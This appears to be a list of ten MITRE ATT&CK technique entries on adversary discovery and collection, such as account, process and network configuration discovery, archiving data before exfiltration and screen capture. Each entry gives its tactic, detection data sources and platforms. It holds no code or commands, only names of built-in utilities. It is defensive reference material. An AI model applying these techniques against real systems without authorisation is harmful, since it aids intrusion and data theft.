Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre